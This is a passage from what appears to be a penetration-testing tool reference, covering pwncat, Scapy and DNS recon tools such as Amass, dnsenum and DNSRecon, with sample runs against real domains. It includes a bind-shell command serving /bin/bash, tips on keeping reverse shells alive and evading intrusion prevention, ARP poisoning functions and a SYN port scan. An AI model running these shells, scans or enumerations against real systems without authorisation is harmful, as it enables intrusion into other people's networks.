--source-addr addr Specify source bind IP address for connect mode.
--source-port port Specify source bind port for connect mode.
--reconn [x] Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted, the client will connect again x many
times before giving up. Omit the quantifier to retry
endlessly or specify a positive integer for how many
times to retry before giving up.
(default: quit if the remote is not available or the
connection was interrupted)
This might be handy for stable TCP reverse shells ;-)
Note on UDP:
By default UDP does not know if it is connected, so
it will stop at the first port and assume it has a
connection. Consider using --udp-sconnect with this
option to make UDP aware of a successful connection.
--reconn-wait s Connect mode (TCP and UDP):
Wait x seconds between re-connects. (default: 1)
--reconn-robin port Connect mode (TCP and UDP):
If the remote server is not reachable or the connection
is interrupted and --reconn is specified, the client
will shuffle ports in round-robin mode to connect to.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Set --reconn to at least the number of ports to probe +1
This helps reverse shell to evade intrusiona prevention
systems that will cut your connection and block the
outbound port.
This is also useful in Connect or Zero-I/O mode to
figure out what outbound ports are allowed.
--ping-init Connect mode (TCP and UDP):
UDP is a stateless protocol unlike TCP, so no hand-
shake communication takes place and the client just
sends data to a server without being "accepted" by
the server first.
This means a server waiting for an UDP client to
connect to, is unable to send any data to the client,
before the client hasn't send data first. The server
simply doesn't know the IP address before an initial
connect.
The --ping-init option instructs the client to send one
single initial ping packet to the server, so that it is
able to talk to the client.
This is a way to make a UDP reverse shell work.
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-intvl s Connect mode (TCP and UDP):
Instruct the client to send ping intervalls every s sec.
This allows you to restart your UDP server and just wait
for the client to report back in. This might be handy
for stable UDP reverse shells ;-)
See --ping-word for what char/string to send as initial
ping packet (default: '\0')
--ping-word str Connect mode (TCP and UDP):
Change the default character '\0' to use for upd ping.
Single character or strings are supported.
--ping-robin port Connect mode (TCP and UDP):
Instruct the client to shuffle the specified ports in
round-robin mode for a remote server to ping.
This might be handy to scan outbound allowed ports.
Use comma separated string such as '80,81,82,83', a range
of ports '80-83' or an increment '80+3'.
Use --ping-intvl 0 to be faster.
--udp-sconnect Connect mode (UDP only):
Emulating stateful behaviour for UDP connect phase by
sending an initial packet to the server to validate if
it is actually connected.
By default, UDP will simply issue a connect and is not
aware if it is really connected or not.
The default connect packet to be send is '\0', you
can change this with --udp-sconnect-word.
--udp-sconnect-word [str]
Connect mode (UDP only):
Change the the data to be send for UDP stateful connect
behaviour. Note you can also omit the string to send an
empty packet (EOF), but be aware that some servers such
as netcat will instantly quit upon receive of an EOF
packet.
The default is to send a null byte sting: '\0'.
misc arguments:
-h, --help Show this help message and exit
-V, --version Show version information and exit
■ Usage example
# Bind shell
# Open a listener on the target host
root@kali_2:~# pwncat -l -e '/bin/bash' 8081
# Connect to the target host and run a command
root@kali_1:~# pwncat 192.168.11.4 8081
hostname
kali_2
# Port forwarding
# Forward connections on port 3307 to the DB server
root@kali_2:~# pwncat -L 3307 192.168.56.3 3306
# Connect from the MySQL client
root@kali_1:~# mysql -u root -h 192.168.11.4 -P 3307
MySQL [(none)]> show databases;
+--------------------+
| Database |
+--------------------+
| information_schema |
| dvwa |
| metasploit |
| mysql |
| owasp10 |
| tikiwiki |
| tikiwiki195 |
+--------------------+
7 rows in set (0.001 sec)
Scapy
An interactive packet manipulation tool. It handles a wide range of tasks such as scanning, tracerouting, probing, attacks and network discovery.
■ Usage
root@kali:~# scapy -H
Welcome to Scapy (2.6.0) using IPython 8.20.0
>>> lsc()
IPID_count : Identify IP id values classes in a list of packets
arp_mitm : ARP MitM: poison 2 target's ARP cache
arpcachepoison : Poison targets' ARP cache
arping : Send ARP who-has requests to determine which hosts are up::
arpleak : Exploit ARP leak flaws, like NetBSD-SA2017-002.
bind_layers : Bind 2 layers on some specific fields' values.
bridge_and_sniff : Forward traffic between interfaces if1 and if2, sniff and return
chexdump : Build a per byte hexadecimal representation
computeNIGroupAddr : Compute the NI group Address. Can take a FQDN as input parameter
connect_from_ip : Open a TCP socket to a host:port while spoofing another IP.
corrupt_bits : Flip a given percentage (at least one bit) or number of bits
corrupt_bytes : Corrupt a given percentage (at least one byte) or number of bytes
dclocator : Perform a DC Locator as per [MS-ADTS] sect 6.3.6 or RFC4120.
defrag : defrag(plist) -> ([not fragmented], [defragmented],
defragment : defragment(plist) -> plist defragmented as much as possible
dhcp_request : Send a DHCP discover request and return the answer.
dns_resolve : Perform a simple DNS resolution using conf.nameservers with caching
dnssd : Performs a DNS-SD (RFC6763) request
dyndns_add : Send a DNS add message to a nameserver for "name" to have a new "rdata"
dyndns_del : Send a DNS delete message to a nameserver for "name"
etherleak : Exploit Etherleak flaw
explore : Function used to discover the Scapy layers and protocols.
fletcher16_checkbytes : Calculates the Fletcher-16 checkbytes returned as 2 byte binary-string.
fletcher16_checksum : Calculates Fletcher-16 checksum of the given buffer.
fragleak : --
fragleak2 : --
fragment : Fragment a big IP datagram
fuzz : Transform a layer into a fuzzy layer by replacing some default values
getmacbyip : Returns the destination MAC address used to reach a given IP address.
getmacbyip6 : Returns the MAC address of the next hop used to reach a given IPv6 address.
hexdiff : Show differences between 2 binary strings, Packets...
hexdump : Build a tcpdump like hexadecimal view
hexedit : Run hexedit on a list of packets, then return the edited packets.
hexstr : Build a fancy tcpdump like hex from bytes.
import_hexcap : Imports a tcpdump like hexadecimal view
is_promisc : Try to guess if target is in Promisc mode. The target is provided by its ip.
linehexdump : Build an equivalent view of hexdump() on a single line
ls : List available layers, or infos on a given layer class or name.
neighsol : Sends and receive an ICMPv6 Neighbor Solicitation message
overlap_frag : Build overlapping fragments to bypass NIPS
promiscping : Send ARP who-has requests to determine which hosts are in promiscuous mode
rderf : Read a ERF file and return a packet list
rdpcap : Read a pcap or pcapng file and return a packet list
report_ports : portscan a target and output a LaTeX table
restart : Restarts scapy
rfc : Generate an RFC-like representation of a packet def.
send : Send packets at layer 3
sendp : Send packets at layer 2
sendpfast : Send packets at layer 2 using tcpreplay for performance
smbclient : A simple smbclient CLI
sniff : Sniff packets and return a list of packets.
split_layers : Split 2 layers previously bound.
sr : Send and receive packets at layer 3
sr1 : Send packets at layer 3 and return only the first answer
sr1flood : Flood and receive packets at layer 3 and return only the first answer
srbt : send and receive using a bluetooth socket
srbt1 : send and receive 1 packet using a bluetooth socket
srflood : Flood and receive packets at layer 3
srloop : Send a packet at layer 3 in loop and print the answer each time
srp : Send and receive packets at layer 2
srp1 : Send and receive packets at layer 2 and return only the first answer
srp1flood : Flood and receive packets at layer 2 and return only the first answer
srpflood : Flood and receive packets at layer 2
srploop : Send a packet at layer 2 in loop and print the answer each time
tcpdump : Run tcpdump or tshark on a list of packets.
tdecode : Run tshark on a list of packets.
traceroute : Instant TCP traceroute
traceroute6 : Instant TCP traceroute using IPv6
traceroute_map : Util function to call traceroute on multiple targets, then
tshark : Sniff packets and print them calling pkt.summary().
wireshark : Runs Wireshark on a list of packets.
wrerf : Write a list of packets to a ERF file
wrpcap : Write a list of packets to a pcap file
wrpcapng : Write a list of packets to a pcapng file
■ Example
root@kali:~# scapy -H
Welcome to Scapy (2.6.0) using IPython 8.20.0
# Send a DNS query
>>> ans = sr1(IP(dst="8.8.8.8") / UDP(dport=53) / DNS(rd=1, qd=DNSQR(qname="example.com")))
Begin emission
Finished sending 1 packets
Received 1 packets, got 1 answers, remaining 0 packets
>>> ans["DNS"].summary()
'DNS Ans 93.184.215.14'
# Port scan
>>> ans, unans = sr(IP(dst="93.184.215.14") / TCP(dport=[21,22,80,443], flags="S"))
Begin emission
Finished sending 4 packets
Received 6 packets, got 4 answers, remaining 0 packets
>>> ans.summary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "SA",prn=lambda s,r: r.sprintf("%TCP.sport% is open"))
http is open
https is open
>>> ans.summary(lfilter = lambda s,r: r.sprintf("%TCP.flags%") == "RA",prn=lambda s,r: r.sprintf("%TCP.sport% is close"))
ssh is close
ftp is close
# Handshake with a MySQL server
# If needed, run iptables -A OUTPUT -p tcp --tcp-flags RST RST -s <source host IP address> -j DROP first (otherwise the OS answers the SYN-ACK with a RST before Scapy does)
>>> def handshake():
...: sport = random.randint(1024, 65535)
...: seq = random.randint(1000, 2000)
...: ip = IP(dst="192.168.11.4")
...: syn_ack = sr1(ip / TCP(sport=sport, dport=3306, flags="S", seq=seq))
...: return sr(ip / TCP(sport=sport, dport=3306, flags="A", seq=syn_ack.ack, ack=syn_ack.seq + 1))
...:
>>> ans, unans = handshake()
Begin emission
..*
Finished sending 1 packets
Received 3 packets, got 1 answers, remaining 0 packets
Begin emission
Finished sending 1 packets
*
Received 1 packets, got 1 answers, remaining 0 packets
>>> raw = ans[0].answer["Raw"].load
# Extract the bytes after the protocol version (version 10) up to the first NUL byte (the server version string)
>>> print(raw[raw.index(b'\x0a') + 1:raw.index(b'\x00', raw.index(b'\x0a') + 1)].decode('ascii'))
5.0.51a-3ubuntu5
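The last step above slices the server version out of the MySQL greeting by looking for the first 0x0a byte. The following added example (my code, not from the article or from Scapy) parses the whole Handshake V10 packet instead, header first, and also reports whether the server advertises TLS (CLIENT_SSL), which is the first thing to check when such a port turns out to be reachable. The sample bytes are constructed, not captured; the version string "8.0.36-constructed", connection id and scramble are made up for the sample.

```python
import struct
from dataclasses import dataclass
from typing import Optional

# Capability flag bits from the MySQL client/server protocol (lower and upper halves combined).
CLIENT_SSL = 0x00000800
CLIENT_SECURE_CONNECTION = 0x00008000
CLIENT_PLUGIN_AUTH = 0x00080000


@dataclass
class MySQLGreeting:
    protocol_version: int
    server_version: str
    connection_id: int
    capabilities: int
    charset: int
    status_flags: int
    auth_plugin_name: Optional[str]
    auth_plugin_data: bytes


def parse_mysql_greeting(raw: bytes) -> MySQLGreeting:
    """Parse the TCP payload of the first packet a MySQL server sends (Handshake V10).

    The packet header is read first, so a length byte that happens to be 0x0a
    cannot be mistaken for the protocol version byte.
    """
    if len(raw) < 5:
        raise ValueError("too short for a MySQL packet header")
    # Header: 3-byte little-endian payload length, then 1-byte sequence id (0 for the greeting).
    length = int.from_bytes(raw[0:3], "little")
    seq = raw[3]
    payload = raw[4:4 + length]
    if seq != 0 or len(payload) != length:
        raise ValueError("not a complete initial handshake packet")
    proto = payload[0]
    if proto != 10:
        raise ValueError(f"unsupported protocol version {proto}")
    # NUL-terminated server version string (what the Scapy one-liner above extracts).
    end = payload.index(b"\x00", 1)
    version = payload[1:end].decode("ascii", errors="replace")
    pos = end + 1
    (conn_id,) = struct.unpack_from("<I", payload, pos)
    pos += 4
    auth_data = payload[pos:pos + 8]          # auth-plugin-data part 1 (8 bytes)
    pos += 8 + 1                              # ... followed by one filler byte
    (cap_lo,) = struct.unpack_from("<H", payload, pos)
    pos += 2
    caps, charset, status, plugin_name = cap_lo, 0, 0, None
    if len(payload) > pos:
        charset = payload[pos]
        status, cap_hi = struct.unpack_from("<HH", payload, pos + 1)
        pos += 5
        caps = cap_lo | (cap_hi << 16)
        auth_len = payload[pos] if caps & CLIENT_PLUGIN_AUTH else 0
        pos += 1 + 10                         # auth-data length byte + 10 reserved bytes
        if caps & CLIENT_SECURE_CONNECTION:
            part2_len = max(13, auth_len - 8)
            auth_data += payload[pos:pos + part2_len]
            pos += part2_len
        if caps & CLIENT_PLUGIN_AUTH:
            name_end = payload.index(b"\x00", pos)
            plugin_name = payload[pos:name_end].decode("ascii", errors="replace")
    if auth_data.endswith(b"\x00"):           # the 20-byte scramble is NUL-terminated on the wire
        auth_data = auth_data[:-1]
    return MySQLGreeting(proto, version, conn_id, caps, charset, status, plugin_name, auth_data)


def tls_offered(greeting: MySQLGreeting) -> bool:
    """True if the server advertises CLIENT_SSL; if not, every login crosses the wire in clear."""
    return bool(greeting.capabilities & CLIENT_SSL)


# Constructed sample greeting (not captured from a real server): 86-byte payload, sequence id 0.
SAMPLE_GREETING = (
    b"\x56\x00\x00\x00"                       # header: payload length 0x56 = 86, seq 0
    b"\x0a"                                   # protocol version 10
    b"8.0.36-constructed\x00"                 # server version (made up)
    b"\x2a\x00\x00\x00"                       # connection id 42
    b"ABCDEFGH" b"\x00"                       # scramble part 1 + filler
    b"\xff\xff"                               # capability flags, lower 16 bits
    b"\xff"                                   # charset 255 (utf8mb4)
    b"\x02\x00"                               # status flags: SERVER_STATUS_AUTOCOMMIT
    b"\xff\xdf"                               # capability flags, upper 16 bits
    b"\x15"                                   # auth plugin data length = 21
    b"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"  # reserved
    b"IJKLMNOPQRST\x00"                       # scramble part 2 (12 bytes + NUL)
    b"caching_sha2_password\x00"              # auth plugin name
)

if __name__ == "__main__":
    g = parse_mysql_greeting(SAMPLE_GREETING)
    print(g.server_version, g.auth_plugin_name, "TLS offered" if tls_offered(g) else "no TLS")
```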
Recon and Information Gathering Tools
DNS Enumeration
Altdns
Generates a list of subdomains by combining the given domain (or subdomains) with a wordlist.
■ Usage
root@kali:~# altdns --help
usage: altdns [-h] -i INPUT -o OUTPUT [-w WORDLIST] [-r] [-n] [-e] [-d DNSSERVER] [-s SAVE] [-t THREADS]
options:
-h, --help show this help message and exit
-i INPUT, --input INPUT
List of subdomains input
-o OUTPUT, --output OUTPUT
Output location for altered subdomains
-w WORDLIST, --wordlist WORDLIST
List of words to alter the subdomains with
-r, --resolve Resolve all altered subdomains
-n, --add-number-suffix
Add number suffix to every domain (0-9)
-e, --ignore-existing
Ignore existing domains in file
-d DNSSERVER, --dnsserver DNSSERVER
IP address of resolver to use (overrides system default)
-s SAVE, --save SAVE File to save resolved altered subdomains to
-t THREADS, --threads THREADS
Amount of threads to run simultaneously
■ Example
root@kali:~# echo "www.nhk.or.jp" > subdomains.txt
root@kali:~# echo -e "1n\n2\n3\n4" > words.txt
# Generate the list of subdomains and resolve them
root@kali:~# altdns -i subdomains.txt -o out.txt -w words.txt -r -s result.txt
www4.nhk.or.jp : www4.gslb.nhk.or.jp.
www2.nhk.or.jp : www2.gslb.nhk.or.jp.
www3.nhk.or.jp : nhk.or.jp.edgekey.net.
root@kali:~# head -n 5 altered_subdomains.txt
www-1n.nhk.or.jp
www4.nhk.or.jp
www.3.nhk.or.jp
4.www.nhk.or.jp
www2.nhk.or.jp
root@kali:~# cat resolved_subdomains.txt
www4.nhk.or.jp:www4.gslb.nhk.or.jp.
www2.nhk.or.jp:www2.gslb.nhk.or.jp.
www3.nhk.or.jp:nhk.or.jp.edgekey.net.
OWASP Amass
Collects information about a domain using a wide range of public and private data sources on the Internet.
Technique | Data Sources |
---|---|
APIs | 360PassiveDNS, Ahrefs, AnubisDB, BeVigil, BinaryEdge, BufferOver, BuiltWith, C99, Chaos, CIRCL, DNSDB, DNSRepo, Deepinfo, Detectify, FOFA, FullHunt, GitHub, GitLab, GrepApp, Greynoise, HackerTarget, Hunter, IntelX, LeakIX, Maltiverse, Mnemonic, Netlas, Pastebin, PassiveTotal, PentestTools, Pulsedive, Quake, SOCRadar, Searchcode, Shodan, Spamhaus, Sublist3rAPI, SubdomainCenter, ThreatBook, ThreatMiner, URLScan, VirusTotal, Yandex, ZETAlytics, ZoomEye |
Certificates | Active pulls (optional), Censys, CertCentral, CertSpotter, Crtsh, Digitorus, FacebookCT |
DNS | Brute forcing, Reverse DNS sweeping, NSEC zone walking, Zone transfers, FQDN alterations/permutations, FQDN Similarity-based Guessing |
Routing | ASNLookup, BGPTools, BGPView, BigDataCloud, IPdata, IPinfo, RADb, Robtex, ShadowServer, TeamCymru |
Scraping | AbuseIPDB, Ask, Baidu, Bing, CSP Header, DNSDumpster, DNSHistory, DNSSpy, DuckDuckGo, Gists, Google, HackerOne, HyperStat, PKey, RapidDNS, Riddler, Searx, SiteDossier, Yahoo |
Web Archives | Arquivo, CommonCrawl, HAW, PublicWWW, UKWebArchive, Wayback |
WHOIS | AlienVault, AskDNS, DNSlytics, ONYPHE, SecurityTrails, SpyOnWeb, WhoisXMLAPI |
[ amass intel ]
■ Usage
root@kali:~# amass intel -help
Usage: amass intel [options] [-whois -d DOMAIN] [-addr ADDR -asn ASN -cidr CIDR]
-active
Attempt certificate name grabs
-addr value
IPs and ranges (192.168.1.1-254) separated by commas
-asn value
ASNs separated by commas (can be used multiple times)
-cidr value
CIDRs separated by commas (can be used multiple times)
-config string
Path to the YAML configuration file. Additional details below
-d value
Domain names separated by commas (can be used multiple times)
-demo
Censor output to make it suitable for demonstrations
-df value
Path to a file providing root domain names
-dir string
Path to the directory containing the output files
-ef string
Path to a file providing data sources to exclude
-exclude value
Data source names separated by commas to be excluded
-h Show the program usage message
-help
Show the program usage message
-if string
Path to a file providing data sources to include
-include value
Data source names separated by commas to be included
-ip
Show the IP addresses for discovered names
-ipv4
Show the IPv4 addresses for discovered names
-ipv6
Show the IPv6 addresses for discovered names
-list
Print additional information
-log string
Path to the log file where errors will be written
-max-dns-queries int
Maximum number of concurrent DNS queries
-o string
Path to the text file containing terminal stdout/stderr
-org string
Search string provided against AS description information
-p value
Ports separated by commas (default: 80, 443)
-r value
IP addresses of preferred DNS resolvers (can be used multiple times)
-rf value
Path to a file providing preferred DNS resolvers
-timeout int
Number of minutes to let enumeration run before quitting
-v Output status / debug / troubleshooting info
-whois
All provided domains are run through reverse whois
■ Example
# Find domains related to the same organisation based on the WHOIS information of the given domain
# (mainly domains whose public WHOIS contact e-mail address domain matches)
root@kali:~# amass intel -d digital.go.jp -whois -config config.yaml
geps.jp
digitalgov.jp
g-eps.jp
g20-digital.go.jp
p-portal.jp
digiso.jp
xn--5ckzcybvd9594d88g.jp
g-eps.net
dejital.jp
gops.jp
g-eps.com
digitalgo.jp
[ amass enum ]
■ Usage
root@kali:~# amass enum -help
Usage: amass enum [options] -d DOMAIN
-active
Attempt zone transfers and certificate name grabs
-addr value
IPs and ranges (192.168.1.1-254) separated by commas
-alts
Enable generation of altered names
-asn value
ASNs separated by commas (can be used multiple times)
-aw value
Path to a different wordlist file for alterations
-awm value
"hashcat-style" wordlist masks for name alterations
-bl value
Blacklist of subdomain names that will not be investigated
-blf string
Path to a file providing blacklisted subdomains
-brute
Execute brute forcing after searches
-cidr value
CIDRs separated by commas (can be used multiple times)
-config string
Path to the YAML configuration file. Additional details below
-d value
Domain names separated by commas (can be used multiple times)
-demo
Censor output to make it suitable for demonstrations
-df value
Path to a file providing root domain names
-dir string
Path to the directory containing the output files
-dns-qps int
Maximum number of DNS queries per second across all resolvers
-ef string
Path to a file providing data sources to exclude
-exclude value
Data source names separated by commas to be excluded
-h Show the program usage message
-help
Show the program usage message
-if string
Path to a file providing data sources to include
-iface string
Provide the network interface to send traffic through
-include value
Data source names separated by commas to be included
-list
Print the names of all available data sources
-log string
Path to the log file where errors will be written
-max-depth int
Maximum number of subdomain labels for brute forcing
-max-dns-queries int
Deprecated flag to be replaced by dns-qps in version 4.0
-min-for-recursive int
Subdomain labels seen before recursive brute forcing (Default: 1) (default 1)
-nf value
Path to a file providing already known subdomain names (from other tools/sources)
-nocolor
Disable colorized output
-norecursive
Turn off recursive brute forcing
-o string
Path to the text file containing terminal stdout/stderr
-oA string
Path prefix used for naming all output files
-p value
Ports separated by commas (default: 80, 443)
-passive
Deprecated since passive is the default setting
-r value
IP addresses of untrusted DNS resolvers (can be used multiple times)
-rf value
Path to a file providing untrusted DNS resolvers
-rqps int
Maximum number of DNS queries per second for each untrusted resolver
-scripts string
Path to a directory containing ADS scripts
-silent
Disable all output during execution
-timeout int
Number of minutes to let enumeration run before quitting
-tr value
IP addresses of trusted DNS resolvers (can be used multiple times)
-trf value
Path to a file providing trusted DNS resolvers
-trqps int
Maximum number of DNS queries per second for each trusted resolver
-v Output status / debug / troubleshooting info
-w value
Path to a different wordlist file for brute forcing
-wm value
"hashcat-style" wordlist masks for DNS brute forcing
■ Example
# Enumerate DNS and map the target
root@kali:~# amass enum -passive -d digital.go.jp -config config.yaml
digital.go.jp (FQDN) --> mx_record --> digital-go-jp.mail.protection.outlook.com (FQDN)
www.digital.go.jp (FQDN) --> cname_record --> d30g3edt6pkfyb.cloudfront.net (FQDN)
vjw-lp.digital.go.jp (FQDN) --> cname_record --> vjw-lp.web.app (FQDN)
services.digital.go.jp (FQDN) --> cname_record --> da-web-service-intro-prd.web.app (FQDN)
mynumber-pr.digital.go.jp (FQDN) --> cname_record --> d3qav5ugx9y79i.cloudfront.net (FQDN)
app-stg.payment.digital.go.jp (FQDN) --> cname_record --> d-cr3h2hr57c.execute-api.ap-northeast-1.amazonaws.com (FQDN)
dashboard.payment.digital.go.jp (FQDN) --> cname_record --> d-3alt7hg4c3.execute-api.ap-northeast-1.amazonaws.com (FQDN)
console.developers.digital.go.jp (FQDN) --> cname_record --> d1377vqmx05042.cloudfront.net (FQDN)
well-being.digital.go.jp (FQDN) --> a_record --> 3.114.187.131 (IPAddress)
well-being.digital.go.jp (FQDN) --> a_record --> 52.192.197.43 (IPAddress)
[...]
assetfinder
Searches for domains and subdomains related to the given domain using multiple data sources such as crt.sh, certspotter and hackertarget.
■ Usage
root@kali:~# assetfinder --help
Usage of assetfinder:
-subs-only
Only include subdomains of search domain
■ Example
root@kali:~# assetfinder --subs-only qiita.com | sort | uniq | head -n 5
*.terminated.qiita.com
119.qiita.com
ads.qiita.com
app.teams.qiita.com
blog.qiita.com
dnsenum
Enumerates the DNS information of the given domain.
■ Usage
root@kali:~# dnsenum --help
Usage: dnsenum [Options] <domain>
[Options]:
Note: If no -f tag supplied will default to /usr/share/dnsenum/dns.txt or
the dns.txt file in the same directory as dnsenum
GENERAL OPTIONS:
--dnsserver <server>
Use this DNS server for A, NS and MX queries.
--enum Shortcut option equivalent to --threads 5 -s 15 -w.
-h, --help Print this help message.
--noreverse Skip the reverse lookup operations.
--nocolor Disable ANSIColor output.
--private Show and save private ips at the end of the file domain_ips.txt.
--subfile <file> Write all valid subdomains to this file.
-t, --timeout <value> The tcp and udp timeout values in seconds (default: 10s).
--threads <value> The number of threads that will perform different queries.
-v, --verbose Be verbose: show all the progress and all the error messages.
GOOGLE SCRAPING OPTIONS:
-p, --pages <value> The number of google search pages to process when scraping names,
the default is 5 pages, the -s switch must be specified.
-s, --scrap <value> The maximum number of subdomains that will be scraped from Google (default 15).
BRUTE FORCE OPTIONS:
-f, --file <file> Read subdomains from this file to perform brute force. (Takes priority over default dns.txt)
-u, --update <a|g|r|z>
Update the file specified with the -f switch with valid subdomains.
a (all) Update using all results.
g Update using only google scraping results.
r Update using only reverse lookup results.
z Update using only zonetransfer results.
-r, --recursion Recursion on subdomains, brute force all discovered subdomains that have an NS record.
WHOIS NETRANGE OPTIONS:
-d, --delay <value> The maximum value of seconds to wait between whois queries, the value is defined randomly, default: 3s.
-w, --whois Perform the whois queries on c class network ranges.
**Warning**: this can generate very large netranges and it will take lot of time to perform reverse lookups.
REVERSE LOOKUP OPTIONS:
-e, --exclude <regexp>
Exclude PTR records that match the regexp expression from reverse lookup results, useful on invalid hostnames.
OUTPUT OPTIONS:
-o --output <file> Output in XML format. Can be imported in MagicTree (www.gremwell.com)
■ Example
root@kali:~# dnsenum qiita.com --file dns.txt --noreverse
dnsenum VERSION:1.3.1
----- qiita.com -----
Host's addresses:
__________________
qiita.com. 52 IN A 18.179.159.154
qiita.com. 52 IN A 52.198.50.148
qiita.com. 52 IN A 35.73.37.55
Wildcard detection using: gbjxjheemwlb
_______________________________________
gbjxjheemwlb.qiita.com. 60 IN A 35.74.119.220
gbjxjheemwlb.qiita.com. 60 IN A 13.113.218.100
gbjxjheemwlb.qiita.com. 60 IN A 52.192.78.222
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Wildcards detected, all subdomains will point to the same IP address
Omitting results containing 35.74.119.220, 13.113.218.100, 52.192.78.222.
Maybe you are using OpenDNS servers.
!!!!!!!!!!!!!!!!!!!!!!!!!!!!
Name Servers:
______________
ns-1049.awsdns-03.org. 85733 IN A 205.251.196.25
ns-1956.awsdns-52.co.uk. 85727 IN A 205.251.199.164
ns-171.awsdns-21.com. 85730 IN A 205.251.192.171
ns-772.awsdns-32.net. 11694 IN A 205.251.195.4
Mail (MX) Servers:
___________________
aspmx3.googlemail.com. 293 IN A 142.250.115.27
aspmx4.googlemail.com. 293 IN A 108.177.104.27
aspmx5.googlemail.com. 293 IN A 142.250.152.27
aspmx.l.google.com. 293 IN A 64.233.187.26
alt1.aspmx.l.google.com. 91 IN A 142.250.141.26
alt2.aspmx.l.google.com. 293 IN A 142.250.115.27
aspmx2.googlemail.com. 293 IN A 142.250.141.27
[...]
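dnsenum's wildcard step above (resolve a random label, then omit every result that contains one of the wildcard addresses) in a few lines of Python, as an added example that is not part of the original article or of dnsenum. The resolver is a constructed stand-in over a made-up example.test zone so it runs offline; a real DNS client can be dropped in for the same logic. The dev host shows the trade-off of the filter: a genuine record that shares the wildcard's addresses disappears too, which is why tools offer a switch to keep such results.

```python
import random
import string
from typing import Callable, Dict, List, Optional, Set

# A resolver maps a name to its A records; an empty list means no answer (NXDOMAIN).
Resolver = Callable[[str], List[str]]


def detect_wildcard(domain: str, resolve: Resolver, probes: int = 3,
                    seed: Optional[int] = None) -> Set[str]:
    """Resolve a few random labels under `domain`, as dnsenum does before brute forcing.

    No real host is named like gbjxjheemwlb.<domain>, so any address that comes back
    must be the wildcard answer; the union over all probes is returned.
    """
    rng = random.Random(seed)
    wildcard_ips: Set[str] = set()
    for _ in range(probes):
        label = "".join(rng.choice(string.ascii_lowercase) for _ in range(12))
        wildcard_ips.update(resolve(f"{label}.{domain}"))
    return wildcard_ips


def brute_force(domain: str, words: List[str], resolve: Resolver,
                wildcard_ips: Set[str], filter_wildcard: bool = True) -> Dict[str, List[str]]:
    """Resolve <word>.<domain> for every word, dropping answers that contain a wildcard IP.

    filter_wildcard=False keeps every answer, which is what you get from a tool that
    carries on despite a wildcard without filtering (compare DNSRecon's --iw versus -f).
    """
    found: Dict[str, List[str]] = {}
    for word in words:
        name = f"{word}.{domain}"
        ips = resolve(name)
        if not ips:
            continue
        # dnsenum's rule: omit any result containing one of the wildcard addresses.
        if filter_wildcard and wildcard_ips & set(ips):
            continue
        found[name] = ips
    return found


# Constructed zone for an offline run (RFC 5737 documentation addresses, .test TLD).
ZONE: Dict[str, List[str]] = {
    "www.example.test": ["192.0.2.10"],
    "mail.example.test": ["192.0.2.25"],
    # Explicit record that happens to share the wildcard's addresses: a real host the filter hides.
    "dev.example.test": ["192.0.2.50", "192.0.2.51"],
}
WILDCARD_ANSWER = ["192.0.2.50", "192.0.2.51"]      # what *.example.test resolves to


def fake_resolve(name: str) -> List[str]:
    """Stand-in for a DNS client so the example needs no network access."""
    if name in ZONE:
        return ZONE[name]
    if name.endswith(".example.test"):
        return WILDCARD_ANSWER
    return []


if __name__ == "__main__":
    ips = detect_wildcard("example.test", fake_resolve, seed=1)
    print("Wildcards detected:", sorted(ips))
    for name, addrs in brute_force("example.test", ["www", "mail", "dev", "ftp", "vpn"],
                                   fake_resolve, ips).items():
        print(name, addrs)
```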
dnsgen
Generates domain names in many combinations from the given domain, based on a wordlist.
■ Usage
root@kali:~# dnsgen --help
Usage: dnsgen [OPTIONS] FILENAME
Options:
-l, --wordlen INTEGER RANGE Min length of custom words extracted from
domains. [1<=x<=100]
-w, --wordlist PATH Path to custom wordlist.
-f, --fast Fast generation.
--help Show this message and exit.
■ Example
root@kali:~# echo "app.example.com" | dnsgen -
help.app.example.com
app.help.example.com
dev.app.example.com
app.dev.example.com
mobileclient.app.example.com
app.mobileclient.example.com
history.app.example.com
app.history.example.com
frontpage.app.example.com
[...]
v3.example.com
documentation.example.com
lab.example.com
repo.example.com
uploads.example.com
vpn.example.com
old.example.com
DNSRecon
Enumerates the common DNS records (MX, SOA, NS, A, AAAA, SPF, TXT) as well as SRV and PTR records, searches for subdomains, and more.
■ Usage
root@kali:~# dnsrecon --help
usage: dnsrecon [-h] [-d DOMAIN] [-n NS_SERVER] [-r RANGE] [-D DICTIONARY] [-f] [-a] [-s] [-b] [-y] [-k] [-w] [-z] [--threads THREADS] [--lifetime LIFETIME]
[--tcp] [--db DB] [-x XML] [-c CSV] [-j JSON] [--iw] [--disable_check_recursion] [--disable_check_bindversion] [-V] [-v] [-t TYPE]
options:
-h, --help show this help message and exit
-d DOMAIN, --domain DOMAIN
Target domain.
-n NS_SERVER, --name_server NS_SERVER
Domain server to use. If none is given, the SOA of the target will be used. Multiple servers can be specified using a comma separated list.
-r RANGE, --range RANGE
IP range for reverse lookup brute force in formats (first-last) or in (range/bitmask).
-D DICTIONARY, --dictionary DICTIONARY
Dictionary file of subdomain and hostnames to use for brute force.
-f Filter out of brute force domain lookup, records that resolve to the wildcard defined IP address when saving records.
-a Perform AXFR with standard enumeration.
-s Perform a reverse lookup of IPv4 ranges in the SPF record with standard enumeration.
-b Perform Bing enumeration with standard enumeration.
-y Perform Yandex enumeration with standard enumeration.
-k Perform crt.sh enumeration with standard enumeration.
-w Perform deep whois record analysis and reverse lookup of IP ranges found through Whois when doing a standard enumeration.
-z Performs a DNSSEC zone walk with standard enumeration.
--threads THREADS Number of threads to use in reverse lookups, forward lookups, brute force and SRV record enumeration.
--lifetime LIFETIME Time to wait for a server to respond to a query. default is 3.0
--tcp Use TCP protocol to make queries.
--db DB SQLite 3 file to save found records.
-x XML, --xml XML XML file to save found records.
-c CSV, --csv CSV Save output to a comma separated value file.
-j JSON, --json JSON save output to a JSON file.
--iw Continue brute forcing a domain even if a wildcard record is discovered.
--disable_check_recursion
Disables check for recursion on name servers
--disable_check_bindversion
Disables check for BIND version on name servers
-V, --version Show DNSrecon version
-v, --verbose Enable verbose
-t TYPE, --type TYPE Type of enumeration to perform.
Possible types:
std: SOA, NS, A, AAAA, MX and SRV.
rvl: Reverse lookup of a given CIDR or IP range.
brt: Brute force domains and hosts using a given dictionary.
srv: SRV records.
axfr: Test all NS servers for a zone transfer.
